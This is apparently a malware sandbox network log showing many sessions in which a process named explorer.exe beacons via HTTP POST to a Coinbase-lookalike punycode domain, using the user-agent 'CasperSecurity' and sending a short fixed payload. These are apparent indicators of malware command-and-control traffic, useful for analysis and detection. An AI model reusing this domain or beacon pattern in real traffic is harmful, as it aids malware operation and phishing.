                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                72192.168.2.449848188.114.96.3802580C:\Windows\explorer.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                Jul 6, 2024 13:28:21.524236917 CEST192OUTPOST /api.php?{B955B2CC07A01546086603} HTTP/1.1
                                                                                                                                                                                                                                Host: auth.xn--conbase-sfb.xyz
                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                Content-type: text/html
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                User-Agent: CasperSecurity
                                                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:21.529037952 CEST6OUTData Raw: 46 5a 57 56
                                                                                                                                                                                                                                Data Ascii: FZWV
                                                                                                                                                                                                                                Jul 6, 2024 13:28:22.393238068 CEST625INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Sat, 06 Jul 2024 11:28:22 GMT
                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WpG5saD3cCUty2c4WMEQ3yQfwEWV6Bym%2FQsV6k6BeZzY5eGp%2FOL%2FpLUMOMccaOE%2BwvANWZ06c43dTg4epAEVPn1%2FHU%2BXU5El3jCaEIZsB00Qw7j4PsL72pysNoJcI%2Fc6ZVJOgYlIcu0rrJ0%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                CF-RAY: 89ef40391fef42a1-EWR
                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                73192.168.2.449849188.114.96.3802580C:\Windows\explorer.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                Jul 6, 2024 13:28:22.525957108 CEST192OUTPOST /api.php?{B955B2CC07A01546086603} HTTP/1.1
                                                                                                                                                                                                                                Host: auth.xn--conbase-sfb.xyz
                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                Content-type: text/html
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                User-Agent: CasperSecurity
                                                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:22.531734943 CEST6OUTData Raw: 46 5a 57 56
                                                                                                                                                                                                                                Data Ascii: FZWV
                                                                                                                                                                                                                                Jul 6, 2024 13:28:23.797530890 CEST613INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Sat, 06 Jul 2024 11:28:23 GMT
                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Gpp0QoxhvWSKTQDf1ROsO5oEe3nFjRy8rELhzAkgDNzgUMbHJoenRDYkmFwEx5q8Mgm2CiRn4SZXINlVXj2yHJh5kd8x0yPDTAZayqBe7nY1mMW4pRu9PqAmhVWinFg2XOYqRUUwBO%2F3ryQ%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                CF-RAY: 89ef403f6872431f-EWR
                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                74192.168.2.449850188.114.96.3802580C:\Windows\explorer.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                Jul 6, 2024 13:28:23.914511919 CEST192OUTPOST /api.php?{B955B2CC07A01546086603} HTTP/1.1
                                                                                                                                                                                                                                Host: auth.xn--conbase-sfb.xyz
                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                Content-type: text/html
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                User-Agent: CasperSecurity
                                                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:23.919540882 CEST6OUTData Raw: 46 5a 57 56
                                                                                                                                                                                                                                Data Ascii: FZWV
                                                                                                                                                                                                                                Jul 6, 2024 13:28:24.676249981 CEST615INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Sat, 06 Jul 2024 11:28:24 GMT
                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zp9xlWKvs6QyOSqojbxYlqGmoj80ECOzdtbRfkU7hbcd9wd953oE4ZdRcPn57qVRdGcVUoxWrbFsLbT3DJiTW2E%2FWj5okLyHu5MH9U0f3jxKVaF8hMYL6XsKS68eHGJwJC7xk%2F9EJA6xItI%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                CF-RAY: 89ef4047f9de8c8a-EWR
                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                75192.168.2.449851188.114.96.3802580C:\Windows\explorer.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                Jul 6, 2024 13:28:24.804114103 CEST192OUTPOST /api.php?{B955B2CC07A01546086603} HTTP/1.1
                                                                                                                                                                                                                                Host: auth.xn--conbase-sfb.xyz
                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                Content-type: text/html
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                User-Agent: CasperSecurity
                                                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:24.809154034 CEST6OUTData Raw: 46 5a 57 56
                                                                                                                                                                                                                                Data Ascii: FZWV
                                                                                                                                                                                                                                Jul 6, 2024 13:28:25.557785988 CEST625INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Sat, 06 Jul 2024 11:28:25 GMT
                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Y2%2BSwHt%2BWxnhjdd3oOZENzULPlXifwqBKvD2UXqR69c2I49%2FS2U%2FJgKSucZLfxMbq9J1%2BfphXle6TuBwC7lf77ZvjbS%2B0TbweGOB4tzqwQ5SxufR46Br48VMvCYOX%2FYdmgPcCu3Be48GFBs%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                CF-RAY: 89ef404d9e5b17e1-EWR
                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                76192.168.2.449854188.114.96.3802580C:\Windows\explorer.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                Jul 6, 2024 13:28:25.683913946 CEST192OUTPOST /api.php?{B955B2CC07A01546086603} HTTP/1.1
                                                                                                                                                                                                                                Host: auth.xn--conbase-sfb.xyz
                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                Content-type: text/html
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                User-Agent: CasperSecurity
                                                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:25.690489054 CEST6OUTData Raw: 46 5a 57 56
                                                                                                                                                                                                                                Data Ascii: FZWV
                                                                                                                                                                                                                                Jul 6, 2024 13:28:26.415488005 CEST621INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Sat, 06 Jul 2024 11:28:26 GMT
                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=izziIp45bKHg4ohJg2eYtLZQ1QZuTaS13%2FTZMruND0%2BUy8lOvPV5cU4DVZEs6LXeitaEEMIXm3AHKSoMBeSJwoEwNIVmkQZOE1RXiXzmAetzkdEJw%2BlyjJFV9tEK6aBd%2BFwDcaJr%2FaF15rI%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                CF-RAY: 89ef40531e915e79-EWR
                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                77192.168.2.449855188.114.96.3802580C:\Windows\explorer.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                Jul 6, 2024 13:28:26.543922901 CEST192OUTPOST /api.php?{B955B2CC07A01546086603} HTTP/1.1
                                                                                                                                                                                                                                Host: auth.xn--conbase-sfb.xyz
                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                Content-type: text/html
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                User-Agent: CasperSecurity
                                                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:26.555844069 CEST6OUTData Raw: 46 5a 57 56
                                                                                                                                                                                                                                Data Ascii: FZWV
                                                                                                                                                                                                                                Jul 6, 2024 13:28:27.424565077 CEST625INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Sat, 06 Jul 2024 11:28:27 GMT
                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Y%2BcCTCKyVtFzgeAF8Xae5T2M8kDRAT7cQbKZ3%2FS4b8JK%2B6VL3RnuxTflampZupW6n8EbM3Xlqy4cIDxZ1Sl%2F7KOcgkToWJzuPEcHGBSR3C7GP5wN%2FdjX%2F7j7mPovfTyRF4fs%2BcBbP7vnFDw%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                CF-RAY: 89ef40588a3a1879-EWR
                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                78192.168.2.449856188.114.96.3802580C:\Windows\explorer.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                Jul 6, 2024 13:28:27.540889978 CEST192OUTPOST /api.php?{B955B2CC07A01546086603} HTTP/1.1
                                                                                                                                                                                                                                Host: auth.xn--conbase-sfb.xyz
                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                Content-type: text/html
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                User-Agent: CasperSecurity
                                                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:27.545969963 CEST6OUTData Raw: 46 5a 57 56
                                                                                                                                                                                                                                Data Ascii: FZWV
                                                                                                                                                                                                                                Jul 6, 2024 13:28:28.337816954 CEST619INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Sat, 06 Jul 2024 11:28:28 GMT
                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=92qYR07c8jHquo30F8zjC4RZvVFxcq69DIO34L6eASC%2FjeIjJmB9Km%2FgC2CWQSbC6pTLGEnZ%2B%2BepgS76BvEKRGAb0Ghb5jj5WhLIGrlpoN3oBY2yBTr9Ee1Pp4F7VGUzwT8pWbPg8uSekNM%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                CF-RAY: 89ef405ecfa44240-EWR
                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                79192.168.2.449860188.114.96.3802580C:\Windows\explorer.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                Jul 6, 2024 13:28:28.461699009 CEST192OUTPOST /api.php?{B955B2CC07A01546086603} HTTP/1.1
                                                                                                                                                                                                                                Host: auth.xn--conbase-sfb.xyz
                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                Content-type: text/html
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                User-Agent: CasperSecurity
                                                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:28.466675997 CEST6OUTData Raw: 46 5a 57 56
                                                                                                                                                                                                                                Data Ascii: FZWV
                                                                                                                                                                                                                                Jul 6, 2024 13:28:30.128591061 CEST619INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Sat, 06 Jul 2024 11:28:30 GMT
                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4qvCFXhVvaZohCkjPxvkiLzl3m5DOE%2BimcPzrkPC%2BVWJPNP4V4RacLZeuYDMQ70UTG0iNKHCxHUMgW8uQY%2BnYqmIVMR63emPHn6GSqWPXoSx9msjtLRkgUXfeAheKR2gnhxIeV5m4L%2FWK8Y%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                CF-RAY: 89ef40647a5e42ca-EWR
                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                80192.168.2.449864188.114.96.3802580C:\Windows\explorer.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                Jul 6, 2024 13:28:30.242759943 CEST192OUTPOST /api.php?{B955B2CC07A01546086603} HTTP/1.1
                                                                                                                                                                                                                                Host: auth.xn--conbase-sfb.xyz
                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                Content-type: text/html
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                User-Agent: CasperSecurity
                                                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:30.247777939 CEST6OUTData Raw: 46 5a 57 56
                                                                                                                                                                                                                                Data Ascii: FZWV
                                                                                                                                                                                                                                Jul 6, 2024 13:28:30.961313963 CEST623INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Sat, 06 Jul 2024 11:28:30 GMT
                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BZJytN%2Bco6EXNnt84R5lUSdu6Zd3uia3LmSvfdprkCmVW1cBWtN%2Baa3qUWLgH%2BySPGCIxPOUy%2F7jT%2BGj91C0X7NnUMlmjaNVzmMsXf7V8iqwntsxWxpiqnHZYeaizOidfsEc562rFD3k9Wo%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                CF-RAY: 89ef406faff60f3d-EWR
                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                81192.168.2.449867188.114.96.3802580C:\Windows\explorer.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                Jul 6, 2024 13:28:31.071362972 CEST192OUTPOST /api.php?{B955B2CC07A01546086603} HTTP/1.1
                                                                                                                                                                                                                                Host: auth.xn--conbase-sfb.xyz
                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                Content-type: text/html
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                User-Agent: CasperSecurity
                                                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:31.076598883 CEST6OUTData Raw: 46 5a 57 56
                                                                                                                                                                                                                                Data Ascii: FZWV
                                                                                                                                                                                                                                Jul 6, 2024 13:28:31.908749104 CEST621INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Sat, 06 Jul 2024 11:28:31 GMT
                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ow0CqHmn9bcYupGwqzJTTRg%2FbbmyHidQVWtYHeT7xHBs%2FPdS0%2FEWlbQEZgtJBW89mc6R7azJzTxHiSYs6nrKeCYeqfKkO%2FQECWbalJy7MLsOft49Hg1i2TL4nwysnyDcyt%2BXMtjrvySlpyQ%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                CF-RAY: 89ef4074cd2e437f-EWR
                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                82192.168.2.449870188.114.96.3802580C:\Windows\explorer.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                Jul 6, 2024 13:28:32.180434942 CEST192OUTPOST /api.php?{B955B2CC07A01546086603} HTTP/1.1
                                                                                                                                                                                                                                Host: auth.xn--conbase-sfb.xyz
                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                Content-type: text/html
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                User-Agent: CasperSecurity
                                                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:32.185480118 CEST6OUTData Raw: 46 5a 57 56
                                                                                                                                                                                                                                Data Ascii: FZWV
                                                                                                                                                                                                                                Jul 6, 2024 13:28:32.938951969 CEST619INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Sat, 06 Jul 2024 11:28:32 GMT
                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TI4cBUB8VCyDzkAGEukyDAsSCwbNfKlGFM8k6hMcHYfrzA2ES%2BEzwdm%2F7aUXOxoNurye761pJRaZTaZfRIT3KbARB%2FGNxoWVUgOQFn02YZ6Z1Mlh6gNWwGk7vAW4U9MOYxzBDfd46v%2Fq3xQ%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                CF-RAY: 89ef407babc31821-EWR
                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                83192.168.2.449871188.114.96.3802580C:\Windows\explorer.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                Jul 6, 2024 13:28:33.057733059 CEST192OUTPOST /api.php?{B955B2CC07A01546086603} HTTP/1.1
                                                                                                                                                                                                                                Host: auth.xn--conbase-sfb.xyz
                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                Content-type: text/html
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                User-Agent: CasperSecurity
                                                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:33.062560081 CEST6OUTData Raw: 46 5a 57 56
                                                                                                                                                                                                                                Data Ascii: FZWV
                                                                                                                                                                                                                                Jul 6, 2024 13:28:33.806818008 CEST619INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Sat, 06 Jul 2024 11:28:33 GMT
                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=EUkNLoWXpdqqfRkywF6yTT4p0UI7jzlHGnIF3iDBEFXoDtCdRCF9ql3DOiwzYRUNtEvc7GnbqSJ8%2BqC3YelQbhaM5VLwbt9W1Cv%2FD%2BNEOEMHlKbDdwzhzqLYkFimyKLjuuDf6c%2BArMLOpqg%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                CF-RAY: 89ef4081394d0f36-EWR
                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                84192.168.2.449873188.114.96.3802580C:\Windows\explorer.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                Jul 6, 2024 13:28:33.931746006 CEST192OUTPOST /api.php?{B955B2CC07A01546086603} HTTP/1.1
                                                                                                                                                                                                                                Host: auth.xn--conbase-sfb.xyz
                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                Content-type: text/html
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                User-Agent: CasperSecurity
                                                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:33.939966917 CEST6OUTData Raw: 46 5a 57 56
                                                                                                                                                                                                                                Data Ascii: FZWV
                                                                                                                                                                                                                                Jul 6, 2024 13:28:34.772316933 CEST619INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Sat, 06 Jul 2024 11:28:34 GMT
                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lQAu%2F9zI8LY5PC3IohTYZWehdyfXRiJtV%2BHBqjcmqUOEC%2FTGUWyJAW7ZSIMrEbNfikVRQtdg4qII7uiOxZw1yIwEReaJGpw2EBKgo7gXMs8lx%2F8EORkU1dwR12mY94AWspslpzsk3m0stTM%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                CF-RAY: 89ef4086bd6a0f39-EWR
                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                85192.168.2.449875188.114.96.3802580C:\Windows\explorer.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                Jul 6, 2024 13:28:35.333379030 CEST192OUTPOST /api.php?{B955B2CC07A01546086603} HTTP/1.1
                                                                                                                                                                                                                                Host: auth.xn--conbase-sfb.xyz
                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                Content-type: text/html
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                User-Agent: CasperSecurity
                                                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:35.338249922 CEST6OUTData Raw: 46 5a 57 56
                                                                                                                                                                                                                                Data Ascii: FZWV
                                                                                                                                                                                                                                Jul 6, 2024 13:28:36.336802006 CEST619INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Sat, 06 Jul 2024 11:28:36 GMT
                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
